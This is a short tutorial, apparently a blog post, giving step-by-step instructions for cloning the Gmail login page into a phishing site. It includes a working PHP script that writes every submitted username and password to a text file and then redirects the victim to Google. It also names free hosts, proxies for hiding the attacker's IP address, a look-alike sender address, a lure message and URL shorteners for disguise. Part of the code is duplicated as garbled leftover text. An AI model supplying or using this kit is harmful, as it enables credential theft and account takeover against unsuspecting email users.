Steps for Creating Phishing or Fake web Page:
Step 1:
Go to the gmail.com. Save the Page as "complet HTML" file
Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step3:
Upload those image to tinypic or photobucker.com. copy the url of each image.
Step4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5:
Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php"
save the file.
Step6:
Now you need to create login.php
so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save itheader("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of subdomainWeb hosting site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address) like: http://flyproxy.com . find best secure connection site.
Step 8:
create an email with gmail keyword.
like : gmailburger@gmail.com
Step 9:
Send to victim similar to " gmail starts new feature to use this service log in to this page"from that gmail id with link to your phishing web page.
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
0 Komentar